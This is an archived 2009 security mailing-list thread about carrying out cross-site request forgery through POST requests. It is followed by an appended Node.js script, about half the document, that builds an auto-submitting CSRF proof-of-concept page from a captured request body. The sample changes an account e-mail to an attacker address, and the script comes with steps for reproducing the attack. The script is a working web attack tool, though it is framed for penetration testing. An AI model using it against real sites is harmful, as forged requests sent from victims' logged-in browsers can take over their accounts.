Web Application Security
CSRF through POST  Dec 15 2009 12:57AM  Robin Wood (dninja gmail com)  (2 replies)
  Re: CSRF through POST  Dec 16 2009 04:37PM  arvind doraiswamy (arvind doraiswamy gmail com)  (1 reply)
    Re: CSRF through POST  Dec 16 2009 04:47PM  Robin Wood (dninja gmail com)  (2 replies)
automatically and hence will send the post parameters.
Thanks,
Boaz
-----Original Message-----
From: listbounce (at) securityfocus (dot) com [mailto:listbounce (at) securityfocus (dot) com]
On Behalf Of Robin Wood
Sent: Wednesday, December 16, 2009 6:47 PM
To: arvind doraiswamy
Cc: webappsec (at) securityfocus (dot) com
Subject: Re: CSRF through POST
2009/12/16 arvind doraiswamy <arvind.doraiswamy (at) gmail (dot) com>:
> Hey Robin,
> You shouldn't worry about GET or POST. A CSRF will happen in both
> places. It's just that the GET is easier and more visible.
>
> For a POST you could either use OWASP's CSRF Tester to record and
> replay a request. Or you could create an HTML page manually with all
> hidden variables and just a button as a POC.
It is this bit I was after info on, I could think of a way that I
would attempt a POST but wanted to see research others had done.
As it turns out I've had quite a few good leads passed across, thanks
to everyone. Most work in a similar way but all have slight variations
that are useful to know about when trying to work out the best way to
attack a target.
Robin
>
> Cheers
> Arvind
>
>> On Tue, Dec 15, 2009 at 6:27 AM, Robin Wood <dninja (at) gmail (dot) com> wrote:
>> Hi
>> Can anyone point me at any good papers on doing CSRF through POST
>> parameters? I've found some sites with redirect scripts which help
>> performing the attack but no good write-ups on different ways to
>> perform it.
>>
>> Robin
>>
>>
>>
>> This list is sponsored by Cenzic
>> --------------------------------------
>> Let Us Hack You. Before Hackers Do!
>> It's Finally Here - The Cenzic Website HealthCheck. FREE.
>> Request Yours Now!
>> http://www.cenzic.com/2009HClaunch_Securityfocus
>> --------------------------------------
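Arvind's suggestion above (an HTML page carrying the hidden variables and a button) and Boaz's point about the form being submitted automatically, as an added example that is not part of the thread: a small Node.js script that turns a captured POST body into a CSRF proof-of-concept page, in either the click-to-submit or the auto-submit variant. The target URL, field names and values are constructed for illustration and belong to no real site.

```javascript
// Added example, not code from the thread: generate the CSRF proof-of-concept
// page Arvind describes (a form of hidden fields plus a button) from a captured
// POST body, with an optional auto-submit variant. The target URL and field
// names below are constructed for illustration and belong to no real site.

// Escape a value for use inside a double-quoted HTML attribute, so a value
// captured from the target cannot break out of the generated form.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Parse a captured application/x-www-form-urlencoded body ("a=1&b=2") into
// ordered [name, value] pairs, decoding %XX escapes and '+' as space.
function parseFormBody(body) {
  const decode = (s) => decodeURIComponent(s.replace(/\+/g, " "));
  return body
    .split("&")
    .filter((pair) => pair.length > 0)
    .map((pair) => {
      const eq = pair.indexOf("=");
      const name = eq === -1 ? pair : pair.slice(0, eq);
      const value = eq === -1 ? "" : pair.slice(eq + 1);
      return [decode(name), decode(value)];
    });
}

// Build the PoC page. autoSubmit=false gives the "just a button" variant;
// autoSubmit=true submits the form as soon as the page loads, so the victim's
// browser sends the POST (with its cookies for the target) without any click.
function buildCsrfPoc(action, fields, autoSubmit) {
  const inputs = fields
    .map(([name, value]) =>
      `    <input type="hidden" name="${escapeHtml(name)}" value="${escapeHtml(value)}">`)
    .join("\n");
  const button = autoSubmit ? "" : `    <input type="submit" value="Continue">\n`;
  const script = autoSubmit
    ? `  <script>document.getElementById("csrf").submit();</script>\n`
    : "";
  return (
    `<!DOCTYPE html>\n<html><body>\n` +
    `  <form id="csrf" method="POST" action="${escapeHtml(action)}">\n` +
    `${inputs}\n${button}  </form>\n${script}</body></html>\n`
  );
}

// Constructed sample: a proxy-captured "change e-mail address" request body.
const capturedBody = "email=victim%40example.com&newEmail=attacker%40evil.example&note=a+b";
const pocHtml = buildCsrfPoc(
  "https://target.example/account/email",
  parseFormBody(capturedBody),
  true
);

// Stand-alone use: node csrf-poc.js > poc.html
if (typeof require !== "undefined" && require.main === module) {
  process.stdout.write(pocHtml);
}
```

The generated page only demonstrates delivery: the forged POST succeeds only when the target authenticates the request by session cookie alone, with no per-request anti-CSRF token, no Origin or Referer check, and no SameSite restriction on the cookie. Save the output as an .html file and open it in a browser that is logged in to the target to reproduce the test.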